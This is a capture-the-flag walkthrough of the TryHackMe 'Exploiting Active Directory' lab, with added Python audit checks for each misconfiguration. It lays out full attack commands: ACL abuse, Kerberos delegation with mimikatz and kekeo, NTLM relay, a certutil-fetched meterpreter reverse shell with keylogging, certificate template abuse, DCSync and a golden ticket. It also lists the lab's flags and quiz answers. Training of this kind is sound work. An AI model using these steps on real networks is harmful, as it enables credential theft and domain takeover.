Exploiting Active Directory - Medium

  1. Exploiting Permission Delegation
  2. Exploiting Kerberos Delegation
  3. Exploiting Automated Relays
  4. Exploiting AD Users
  5. Exploiting GPOs
  6. Exploiting Certificates
  7. Exploiting Domain Trusts

Exploiting Permission Delegation

```
#download given .zip file (output of running SharpHound.exe)

#start neo4j
sudo neo4j console

#run bloodhound
cd /opt/BloodHound/BloodHound-linux-x64
./BloodHound --no-sandbox
#login using neo4j:bloodhound

#drop zip file in bloodhound
#check for privesc

#login via ssh using given creds
ssh za.tryhackme.loc\\ruth.dale@thmwrk1.za.tryhackme.loc

#launch powershell
powershell -ep bypass
```

  • AD can delegate permissions & privileges through a feature named Permission Delegation.

  • Permission Delegation exploits are referred to as ACL-based attacks, as AD allows admins to configure ACEs (Access Control Entries) that populate DACLs (Discretionary Access Control Lists).

  • Many ACEs can be misconfigured, and the exploit varies for each ACE.

  • To exploit these ACEs, we need to interact with AD to make requests, for which tools such as the AD-RSAT cmdlets and PowerSploit can be used.

  • With the given .zip file, produced by executing SharpHound.exe, we can open it in BloodHound.

  • We have been given SSH creds for a user in the "Domain Users" group, which can RDP into THMWRK1; this provides only low-privileged access.

  • As this is a tiered domain, we first need to compromise "Tier 2 Admins"; in BloodHound, we can check for privesc from the "Domain Users" group to the "Tier 2 Admins" group using the pathfinding feature.

  • This shows that "Domain Users" has GenericWrite over "IT Support", which has ForceChangePassword over "Tier 2 Admins" group members; this can be abused, and we can check the 'Abuse Info' section in BloodHound for the PowerSploit-related commands:

```
#in powershell session

Add-ADGroupMember "IT Support" -Members "ruth.dale"
#add our AD account to IT Support group
#using Add-ADGroupMember cmdlet from AD-RSAT toolset

Get-ADGroupMember -Identity "IT Support"
#verify

Get-ADGroupMember -Identity "Tier 2 Admins"
#check members of Tier 2 Admins group
#pick the username of any account from the output

$Password = ConvertTo-SecureString "Password123" -AsPlainText -Force

Set-ADAccountPassword -Identity "t2_ross.bird" -Reset -NewPassword $Password

#now we can login as this tier 2 admin
#and get flag from Administrator's Desktop
ssh za.tryhackme.loc\\t2_ross.bird@thmwrk1.za.tryhackme.loc
```

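As an added audit example (not code from these notes or from BloodHound), the Python below derives the two edge types used above, GenericWrite and ForceChangePassword, from raw ACE fields and walks them the way BloodHound's pathfinding does, so the same chain can be checked from an ACL export without the GUI. The access-mask bits and the extended-right GUID are Windows constants; the sample ACEs are constructed to mirror the path above.

```python
from collections import deque
from dataclasses import dataclass
# ADS_RIGHTS_ENUM bits (Windows SDK constants)
GENERIC_ALL, GENERIC_WRITE, CONTROL_ACCESS = 0x10000000, 0x40000000, 0x00000100
# rightsGuid of the User-Force-Change-Password extended right
FORCE_CHANGE_PASSWORD = "00299570-246d-11d0-a768-00aa006e0529"
ALL_RIGHTS = "00000000-0000-0000-0000-000000000000"  # ObjectType unset: every right

@dataclass(frozen=True)
class Ace:
    principal: str        # IdentityReference, domain prefix stripped
    target: str           # object whose DACL holds this ACE
    mask: int             # ActiveDirectoryRights bit mask
    object_type: str = ALL_RIGHTS

def abusable_rights(ace):
    """Map one ACE to the BloodHound edge names it would produce."""
    rights = []
    if ace.mask & GENERIC_ALL:
        rights.append("GenericAll")
    if ace.mask & GENERIC_WRITE:
        rights.append("GenericWrite")
    # CONTROL_ACCESS counts only when the GUID names this right (or no GUID at all)
    if ace.mask & CONTROL_ACCESS and ace.object_type.lower() in (FORCE_CHANGE_PASSWORD, ALL_RIGHTS):
        rights.append("ForceChangePassword")
    return rights

def find_path(aces, start, goal):
    """Shortest chain of abusable ACEs from start to goal as (src, right, dst) steps, [] if none."""
    edges = {}
    for ace in aces:
        for right in abusable_rights(ace):
            edges.setdefault(ace.principal, []).append((right, ace.target))
    prev, queue = {start: None}, deque([start])   # breadth-first search
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for right, nxt in edges.get(node, []):
            if nxt not in prev:                   # controlling a group/user = acting as it
                prev[nxt] = (node, right)
                queue.append(nxt)
    if goal not in prev:
        return []
    path, node = [], goal
    while prev[node] is not None:
        src, right = prev[node]
        path.append((src, right, node))
        node = src
    return path[::-1]

# Constructed sample mirroring the notes' BloodHound path; the all-1s GUID is a
# made-up extended right that must not be reported as ForceChangePassword
SAMPLE_ACES = [
    Ace("Domain Users", "IT Support", GENERIC_WRITE),
    Ace("IT Support", "t2_ross.bird", CONTROL_ACCESS, FORCE_CHANGE_PASSWORD),
    Ace("IT Support", "Tier 2 Admins", CONTROL_ACCESS, "11111111-1111-1111-1111-111111111111"),
    Ace("Domain Admins", "Tier 2 Admins", GENERIC_ALL),
]
```

Running `find_path(SAMPLE_ACES, "Domain Users", "t2_ross.bird")` yields the two-step chain from the notes, while the same query towards "Tier 2 Admins" returns nothing because the only ACE over that group is held by Domain Admins.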
1. Which ACE would allow you to update any non-protected parameter of a target object? - GenericWrite

2. What is the value of the flag stored on the Desktop of the Administrator user on THMWRK1 (flag1.txt)? - THM{Permission.Delegation.FTW!}

Exploiting Kerberos Delegation

  • Kerberos Delegation is used to enable apps to access resources hosted on a different server.

  • Types of Kerberos Delegation:

    • Unconstrained - originally implemented; least secure method; provides no limits to AD delegation.

    • Constrained - restricts what services an account can be delegated to.

    • Resource-based constrained - provides additional restrictions on Kerberos Delegation for security; the service specifies which objects can delegate to it.

  • Constrained Delegation exploitation:

```
#in privileged ssh session
whoami /groups
#part of Tier 2 Admins

powershell -ep bypass
#launch powershell session

Import-Module C:\Tools\PowerView.ps1

#enumerate available delegations
Get-NetUser -TrustedToAuth

#output shows 'svcIIS' account has
#'msds-allowedtodelegateto' set for WSMAN and HTTP

#also it is given that there is a service
#on THMWRK1 running as the svcIIS user

#we can use Mimikatz to dump secrets
C:\Tools\mimikatz_trunk\x64\mimikatz.exe

#in mimikatz, impersonate system user
token::elevate

#dump secrets from registry hive
lsadump::secrets
#gives password associated with svcIIS

#we can perform the kerberos delegation attack now
#using kekeo and mimikatz

#run kekeo
C:\Tools\kekeo\x64\kekeo.exe

#generate TGT to be used to generate tickets for HTTP and WSMAN services
tgt::ask /user:svcIIS /domain:za.tryhackme.loc /password:Password1@
#gives TGT file

#forge TGS requests for account to be impersonated
#in Tier 1, to access THMSERVER1

#for http
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:http/THMSERVER1.za.tryhackme.loc

#for wsman
tgs::s4u /tgt:TGT_svcIIS@ZA.TRYHACKME.LOC_krbtgt~za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi /user:t1_trevor.jones /service:wsman/THMSERVER1.za.tryhackme.loc

#now we have two TGS tickets
#we can exit kekeo and use mimikatz

C:\Tools\mimikatz_trunk\x64\mimikatz.exe

privilege::debug

#import both TGS tickets
kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_wsman~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

kerberos::ptt TGS_t1_trevor.jones@ZA.TRYHACKME.LOC_http~THMSERVER1.za.tryhackme.loc@ZA.TRYHACKME.LOC.kirbi

exit
#exit mimikatz

klist
#verify tickets were imported

#create and enter PSSession on THMServer1
New-PSSession -ComputerName thmserver1.za.tryhackme.loc

Enter-PSSession -ComputerName thmserver1.za.tryhackme.loc
#enters session on THMServer1

whoami
#t1_trevor.jones

#get flag from Administrator Desktop
```

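An added audit example, not code from the notes or from PowerView: it classifies accounts into the three delegation types listed above from the attributes that Get-NetUser -TrustedToAuth reads, and lists which hosts a constrained-delegation account can reach. The userAccountControl bits are Windows constants; the sample accounts are constructed, with svcIIS shaped like the output in the notes.

```python
# userAccountControl bits (Windows constants)
TRUSTED_FOR_DELEGATION = 0x00080000          # unconstrained delegation
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x01000000  # "use any authentication protocol" (protocol transition)

def classify(account):
    """Delegation type of one account. Resource-based constrained delegation is not
    visible here: it is stored on the *target* in msDS-AllowedToActOnBehalfOfOtherIdentity."""
    uac = account.get("userAccountControl", 0)
    targets = account.get("msDS-AllowedToDelegateTo", [])
    if uac & TRUSTED_FOR_DELEGATION:
        return "unconstrained"
    if targets and uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
        return "constrained-protocol-transition"
    if targets:
        return "constrained-kerberos-only"
    return "none"

def reachable(account):
    """Hosts the account may present impersonated users to, keyed by host with the
    service classes allowed; wsman/http or cifs on a host amounts to control of it."""
    hosts = {}
    for spn in account.get("msDS-AllowedToDelegateTo", []):
        service, _, host = spn.partition("/")
        hosts.setdefault(host.lower(), set()).add(service.lower())
    return hosts

def audit(accounts):
    """(sAMAccountName, type, hosts) for every delegating account. Protocol transition
    is the setting to review first: with "Kerberos only" the S4U2Self ticket is not
    forwardable, so the tgs::s4u step in the notes does not yield a usable service ticket."""
    findings = []
    for acct in accounts:
        kind = classify(acct)
        if kind != "none":
            findings.append((acct["sAMAccountName"], kind, sorted(reachable(acct))))
    return findings

# Constructed sample: svcIIS mirrors the notes' Get-NetUser -TrustedToAuth output,
# the other three accounts are made up for contrast (0x200 = NORMAL_ACCOUNT, 0x1000 = WORKSTATION_TRUST_ACCOUNT)
SAMPLE = [
    {"sAMAccountName": "svcIIS", "userAccountControl": 0x200 | TRUSTED_TO_AUTH_FOR_DELEGATION,
     "msDS-AllowedToDelegateTo": ["WSMAN/THMSERVER1.za.tryhackme.loc",
                                  "http/THMSERVER1.za.tryhackme.loc"]},
    {"sAMAccountName": "svcBackup", "userAccountControl": 0x200,
     "msDS-AllowedToDelegateTo": ["cifs/fileserver01.example.lab"]},
    {"sAMAccountName": "LEGACYAPP$", "userAccountControl": 0x1000 | TRUSTED_FOR_DELEGATION},
    {"sAMAccountName": "ruth.dale", "userAccountControl": 0x200},
]
```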
1. Which Kerberos Delegation type allows for delegation of all services? - Unconstrained Delegation

2. Which Kerberos Delegation type allows the service to specify who is allowed to delegate to it? - Resource-based Constrained Delegation

3. Which Constrained Delegation service allows access to the file system of the system via delegation? - CIFS

4. What is the value of the flag stored in the Desktop directory of the Administrator user on THMSERVER1 (flag2.txt)? - THM{Constrained.Delegation.Can.Be.Very.Bad}

Exploiting Automated Relays

  • All Windows hosts have machine accounts; different DCs (domain controllers) use their machine accounts to synchronise AD updates & changes.

  • There are exceptional cases in AD where one machine has admin rights over another machine; we need to identify these cases using BloodHound.

  • Using the following custom query, we can find instances where a computer has an "AdminTo" relationship over another computer:

    MATCH p=(c1:Computer)-[r1:MemberOf*1..]->(g:Group)-[r2:AdminTo]->(n:Computer) RETURN p

  • This shows that the THMSERVER2 machine account is "MemberOf" the Server Management group, which is "AdminTo" the THMSERVER1 machine account.

  • This is related to the printer bug in the MS-RPRN protocol (Print System Remote Protocol); to exploit it, apart from the machine account's admin privileges, we need to meet these conditions:

    • A valid set of AD account creds
    • Network connectivity to the target's SMB service
    • The target host must be running the Print Spooler service
    • The hosts must not have SMB signing enforced

```
#log into ssh on THMWRK1
ssh za.tryhackme.loc\\paula.bailey@thmwrk1.za.tryhackme.loc

powershell -ep bypass

#check if printspooler service is running
GWMI Win32_Printer -Computer thmserver2.za.tryhackme.loc

#alternate query
Get-PrinterPort -ComputerName thmserver2.za.tryhackme.loc

#in attacker machine
#check THMSERVER1 and THMSERVER2 do not have SMB signing enforced

nmap --script=smb2-security-mode -p445 thmserver1.za.tryhackme.loc

#exploiting authentication relays
#using SpoolSample

#in attacker machine, setup ntlm relay
#using THMSERVER1 IP
ntlmrelayx.py -smb2support -t smb://10.200.60.201 -debug

#in powershell session

exit
#exit powershell
#we are in ssh now

cd C:\Tools

#execute exploit using attacker IP
SpoolSample.exe THMSERVER2.za.tryhackme.loc "10.50.57.82"

#ntlmrelay dumps hashes

#use ServerAdmin hash to log into THMSERVER1
evil-winrm -u ServerAdmin -H <serveradmin-hash> -i 10.200.60.201
#get flag from Administrator.ZA Desktop
```

1. How often (in days) are the passwords of Windows machine accounts rotated by default? - 30

2. What should not be enforced if we want to relay an SMB authentication attempt? - smb signing

3. What is the value of the flag stored in the Desktop directory of the Administrator.ZA user on THMSERVER1 (flag3.txt)? - THM{Printing.Some.Shellz}

Exploiting AD Users

  • Users are the weakest link in the security chain; here we can exploit them using two elements:

    • Credential management
    • Keylogging

```
#in evil-winrm session as ServerAdmin
cd C:\Users

Get-ChildItem -Recurse
#print directory contents recursively
#this shows a .kdbx file

cd C:\Users\trevor.local\Documents

dir
#PasswordDatabase.kdbx

download C:\Users\trevor.local\Documents\PasswordDatabase.kdbx /home/sv/PasswordDatabase.kdbx
#download to attacker machine
#this is encrypted, so we need to find another way

#in attacker machine
#create payload
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.50.57.82 LPORT=4444 -f psh -o shell.ps1

msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.50.57.82; set LPORT 4444; exploit"
#setup listener

#host payload using Python webserver
python3 -m http.server

#in evil-winrm session
certutil.exe -urlcache -split -f http://10.50.57.82:8000/shell.ps1
#get payload

#execute payload
.\shell.ps1

#we get meterpreter shell on attacker
ps | grep "explorer"
#shows a session on THMSERVER1 as trevor.local

migrate <PID of explorer.exe>
#migrate from system to user

getuid
#trevor.local

keyscan_start
#start keylogger

#after 2-3 minutes
keyscan_dump
#stop keylogger
#dumps password

#in attacker machine
sudo apt install keepassx
#now we can open the kdbx file and use the password found earlier
```

1. What application is used to open the kdbx credential database? - KeePass

2. What meterpreter command do we use to move from SYSTEM to user context? - migrate

3. What is the password of the credential database? - Imreallysurenoonewillguessmypassword

4. What is the value of the flag stored in the credential database? - THM{AD.Users.Can.Give.Up.Good.Secrets}

Exploiting GPOs

  • In the .kdbx file found earlier, we had another set of creds "svcServMan:Sup3rStr0ngPass!@".

  • Looking up this account in BloodHound, we can use the pathfinding feature to check the path from 'svcServMan' to 'THMSERVER2'.

  • This shows that 'svcServMan' can "GenericWrite" to 'Management Server Pushes', which can "GpLink" to 'Management Servers', which "Contains" 'THMSERVER2'.

  • So, using this account, we have ownership over a GPO (Group Policy Object), which can be applied to THMSERVER2.

  • GPO is a virtual collection of policy settings; each GPO has a unique name (GUID); this is stored usually in the SYSVOL directory.

  • GPOs can be defined for AD objects; GPM (Group Policy Management) allows us to define policies on the AD structure.

  • We can attempt to exploit GPO and add an AD account to both the local Administrators and local Remote Desktop Users groups:

```
xfreerdp /v:thmwrk1.za.tryhackme.loc /u:louis.thornton /p:Islr3423
#rdp using given creds for THMWRK1

#inject svcServMan creds into memory
#using runas in command prompt
runas /netonly /user:za.tryhackme.loc\svcServMan cmd.exe

#opens cmd.exe
dir \\za.tryhackme.loc\sysvol
#verify it worked correctly

mmc
#open microsoft management console
```

  • In Microsoft Management Console, we can click File > Add/Remove Snap-in > select the 'Group Policy Management' snap-in > Add > OK

  • Now, we can view the GPOs for the 'za.tryhackme.loc' domain; navigate to the GPO in Servers > Management Servers > Management Server Pushes

  • Right-click on the GPO and Edit it - this brings up the Group Policy Management Editor window.

  • Navigate to Computer Configuration > Policies > Windows Settings > Security Settings > Restricted Groups > right-click and select Add Group > Browse > enter 'IT Support' > Check Names > click OK twice - the 'IT Support Properties' window opens next.

  • In the Properties window, the second field is titled 'This group is a member of' - here, we have to add the groups 'Administrators' and 'Remote Desktop Users'.

  • We can click on Apply and OK after these changes; within 15 minutes the GPO will be applied.

  • Then, as we initially added the given user to the "IT Support" group, that account will now have administrative and RDP permissions on THMSERVER2; so we can use xfreerdp to log in to that machine and get the flag.
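A defender checking for the kind of GPO change described above can read it straight out of SYSVOL: Restricted Groups settings are written to the GPO's GptTmpl.inf under the [Group Membership] section, where keys take the form '<group>__Memberof' and '<group>__Members' and SIDs carry a '*' prefix. The Python below, an added example that is not from the notes, parses that section and flags any principal the policy pushes into the local Administrators or Remote Desktop Users group; the sample file content is constructed in the editor's layout.

```python
# Well-known local group SIDs this check watches for
BUILTIN = {"S-1-5-32-544": "Administrators", "S-1-5-32-555": "Remote Desktop Users"}

def load_gpttmpl(path):
    """GptTmpl.inf under SYSVOL (Machine\\Microsoft\\Windows NT\\SecEdit) is UTF-16 with a BOM."""
    with open(path, encoding="utf-16") as fh:
        return fh.read()

def parse_group_membership(text):
    """Return {group: {"memberof": [...], "members": [...]}} from [Group Membership]."""
    groups, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):          # blank or comment
            continue
        if line.startswith("["):
            in_section = line.lower() == "[group membership]"
            continue
        if not in_section or "=" not in line:
            continue
        key, _, value = line.partition("=")
        group, _, kind = key.strip().rpartition("__")  # group names may contain spaces and '\'
        kind = kind.lower()
        if kind not in ("memberof", "members"):
            continue
        entry = groups.setdefault(group.lstrip("*"), {"memberof": [], "members": []})
        entry[kind] = [v.strip().lstrip("*") for v in value.split(",") if v.strip()]
    return groups

def privileged_pushes(text):
    """Sorted (principal, local group) pairs the policy enforces for the watched local
    groups, covering both equivalent spellings the editor can produce."""
    findings = set()
    for group, rel in parse_group_membership(text).items():
        for sid in rel["memberof"]:      # "<group> is a member of <builtin>"
            if sid in BUILTIN:
                findings.add((group, BUILTIN[sid]))
        if group in BUILTIN:             # "<builtin> has members: <principals>"
            for member in rel["members"]:
                findings.add((member, BUILTIN[group]))
    return sorted(findings)

# Constructed GptTmpl.inf in the layout the Restricted Groups editor writes;
# the S-1-5-21-... SID is a made-up domain group, not one from the lab
SAMPLE_GPTTMPL = r"""[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Group Membership]
ZA\IT Support__Memberof = *S-1-5-32-544,*S-1-5-32-555
ZA\IT Support__Members =
*S-1-5-32-555__Members = *S-1-5-21-1111111111-2222222222-3333333333-1105
"""
```

Run `privileged_pushes(load_gpttmpl(path))` over each GPO's GptTmpl.inf after a SYSVOL change; a group such as 'IT Support' appearing next to Administrators on a server OU is the change an attacker with GpLink-equivalent rights would make.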

1. What object allows users to configure Windows policies? - Group Policy Object

2. What AD feature allows us to configure GPOs for the entire AD structure? - Group Policy Management

3. What is the name of the GPO that our compromised AD account owns? - Management Server Pushes

4. What is the value of the flag stored on THMSERVER2 in the Administrator's Desktop directory (flag4.txt)? - THM{Exploiting.GPOs.For.Fun.And.Profit}

Exploiting Certificates

  • AD CS (Certificate Services) is Microsoft's PKI (Public Key Infrastructure) implementation; AD can be used as CA to prove & delegate trust.

  • AD CS usually runs only on selected domain controllers. However, administrators of AD CS can create templates that can allow any user with enough permissions to request a certificate themselves.

  • Finding vulnerable certificate templates:


```
#in rdp session on THMSERVER2
#open powershell
certutil -Template -v > templates.txt
```

  • Going through the file, we need to search for a template with the following combination of parameters:

    • Client Authentication
    • CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT
    • CTPRIVATEKEY_FLAG_EXPORTABLE_KEY
    • Certificate Permissions
  • We can see that 'Template[32]' is the vulnerable template - in this, we can see that machine account of THMSERVER2 can issue a CSR (Certificate Signing Request) for a template that allows us to specify SAN (Subject Alternative Name) and can be used for Client Authentication.

  • Exploiting certificate template:

    • In RDP access, click Start > Run > type 'mmc' to launch MMC > File > Add/Remove Snap-in > Add 'Certificates' snap-in > Select 'Computer Account' and 'Local Computer' when prompted > OK

    • Under Certificates category, right-click on Personal > All Tasks > Request New Certificate > click Next twice to select AD enrollment policy

    • The current template requires more info; click on the More Info warning > change 'Subject Name' type to 'Common Name' and provide any random value > Add > change 'Alternative Name' type to 'User Principal Name' and provide value 'Administrator@za.tryhackme.loc' > Add

    • Click Apply & OK > select certificate and Enroll - we can view our cert now

    • Right-click cert > All Tasks > Export > click Next > select 'Yes, export the private key' > click Next twice > set a password > click Next and set location with filename 'vulncert' > click Next and Finish

    • We can impersonate a user now - use certificate to request Kerberos TGT, then load Kerberos TGT


```
#in RDP access to THMSERVER2
#open command prompt
cd C:\Tools

#we can use Rubeus to load Kerberos TGT
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:C:\Users\louis.thornton\Desktop\vulncert.pfx /password:password /outfile:administrator.kirbi /domain:za.tryhackme.loc /dc:10.200.60.101
#/user switch is to specify the user to be impersonated
#/dc switch is the IP of the domain controller THMCHILDDC

#this generates administrator.kirbi
#we can use mimikatz to load tgt and authenticate to THMDC

mimikatz_trunk\x64\mimikatz.exe
#in mimikatz

privilege::debug

kerberos::ptt administrator.kirbi
#load TGT

exit
#exit mimikatz

#verify if we can access THMDC file system
dir \\THMDC.za.tryhackme.loc\c$
#this successfully prints
#we can get flag now

type \\THMDC.za.tryhackme.loc\c$\Users\Administrator\Desktop\flag5.txt
```

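As an added example (not code from the notes or from certutil), the check below evaluates a template's attributes for the combination of parameters listed above, plus the manager-approval flag that decides whether such a request is issued immediately; the flag bits and EKU OIDs are Microsoft constants, and the sample templates are constructed rather than taken from the lab's templates.txt.

```python
# Template flag bits (Microsoft constants)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001   # in msPKI-Certificate-Name-Flag
CTPRIVATEKEY_FLAG_EXPORTABLE_KEY = 0x00000010     # in msPKI-Private-Key-Flag
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002            # in msPKI-Enrollment-Flag: "CA certificate manager approval"
# EKUs under which a certificate is accepted for Kerberos client authentication
CLIENT_AUTH_EKUS = {"1.3.6.1.5.5.7.3.2",          # Client Authentication
                    "1.3.6.1.5.2.3.4",            # PKINIT Client Authentication
                    "1.3.6.1.4.1.311.20.2.2",     # Smart Card Logon
                    "2.5.29.37.0"}                # Any Purpose
# Principals through which any domain member or machine effectively holds Enroll
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}

def assess(template):
    """One boolean per condition from the notes, plus the approval check."""
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    return {
        "client_auth": not ekus or bool(ekus & CLIENT_AUTH_EKUS),   # no EKU at all = any purpose
        "enrollee_supplies_subject": bool(
            template.get("msPKI-Certificate-Name-Flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT),
        "exportable_key": bool(
            template.get("msPKI-Private-Key-Flag", 0) & CTPRIVATEKEY_FLAG_EXPORTABLE_KEY),
        "low_priv_enroll": bool(set(template.get("enroll", [])) & LOW_PRIV),
        "no_manager_approval": not (
            template.get("msPKI-Enrollment-Flag", 0) & CT_FLAG_PEND_ALL_REQUESTS),
    }

def is_vulnerable(template):
    """True only when every condition holds; approval pending blocks immediate issuance."""
    return all(assess(template).values())

def vulnerable_templates(templates):
    return sorted(t["name"] for t in templates if is_vulnerable(t))

# Constructed templates as a parsed certutil -Template -v listing might yield them;
# 'User' uses flag values in the shape of the default User template (subject built from AD)
SAMPLE_TEMPLATES = [
    {"name": "MachineSAN", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Private-Key-Flag": 0x10,
     "msPKI-Enrollment-Flag": 0x0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Computers"]},
    {"name": "User", "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Private-Key-Flag": 0x10,
     "msPKI-Enrollment-Flag": 0x29,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"],
     "enroll": ["Domain Users"]},
    {"name": "MachineSAN-Approved", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Private-Key-Flag": 0x10,
     "msPKI-Enrollment-Flag": CT_FLAG_PEND_ALL_REQUESTS, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["Domain Computers"]},
    {"name": "WebServer", "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Private-Key-Flag": 0x10,
     "msPKI-Enrollment-Flag": 0x0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"],
     "enroll": ["Domain Computers"]},
]
```

Only the first template satisfies every condition: the second builds the subject from AD, the third holds requests for manager approval, and the fourth carries only the Server Authentication EKU.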
1. What does the user create to ask the CA for a certificate? - Certificate Signing Request

2. What is the name of Microsoft's PKI implementation? - Active Directory Certificate Services

3. What is the value of the flag stored on THMDC in the Administrator's Desktop directory (flag5.txt)? - THM{AD.Certs.Can.Get.You.DA}

Exploiting Domain Trusts

  • We have access to Tier 0 infra so far (the za.tryhackme.loc domain); we can use this to take control of the root domain (tryhackme.loc)

  • Domain Trusts are used in the AD network to gain access to other resources in the domain; trusts outline how domains in a forest communicate with each other.

  • Types of domain trusts:

    • Directional - direction of trust flows from trusting domain to trusted domain

    • Transitive - trust relationship expands beyond just two domains to include other trusted domains

  • If we have compromised a child domain, domain trusts can be exploited to compromise the parent domain as well.

  • KRBTGT is the account used for Kerberos (in Microsoft), and this is the service account for the KDC (Key Distribution Center) service, which handles all Kerberos ticket requests.

  • In a Golden Ticket attack, we bypass the KDC altogether and create our own TGTs, thus becoming a TGS (Ticket Granting Server).

  • To forge TGTs, we need some info:

    • FQDN of domain
    • SID of domain
    • Username of account to be impersonated
    • KRBTGT password hash

```
#in compromised Tier 0 infra session
#open command prompt
cd C:\Tools

mimikatz_trunk\x64\mimikatz.exe

#in mimikatz
privilege::debug

lsadump::dcsync /user:za\krbtgt
#dumps hashes for krbtgt
```

  • We can also forge an Inter-Realm TGT, which is used to provide access to resources in other domains; for this we exploit the bidirectional trust between the child & parent domain.

  • We need to include extra account SIDs from other domains when constructing the Golden Ticket; this includes adding SID of "Enterprise Admins" group - this grants admin privileges over the entire forest.

```
#open powershell in compromised rdp access

#use AD-RSAT cmdlets
#get SID of child DC
Get-ADComputer -Identity "THMDC"

#get SID of EA group
Get-ADGroup -Identity "Enterprise Admins" -Server thmrootdc.tryhackme.loc

#in mimikatz session from earlier
#we can generate golden ticket now
kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:16f9af38fca3ada405386b3b57366082 /sids:S-1-5-21-3330634377-1326264276-632209373-519 /ptt
#/sid for SID of child DC
#/rc4 for NTLM hash of krbtgt
#/sids for SID of EA group

#this generates golden ticket

exit
#exit mimikatz

#verify golden ticket is working
dir \\thmdc.za.tryhackme.loc\c$
#we can access child DC filesystem

dir \\thmrootdc.tryhackme.loc\c$\
#we can access parent DC filesystem too
#we have compromised parent domain
```

1. What domain trust relationship is by default configured between a parent and a child domain? - Bidirectional trust

2. What is the name of the AD account used by the KDC to encrypt and sign TGTs? - krbtgt

3. What is the name of the TGT that grants access to resources outside of our current domain? - Inter-realm TGT

4. What is the value of the flag stored on THMROOTDC in the Administrator's Desktop folder (flag6.txt)? - THM{Full.EA.Compromise}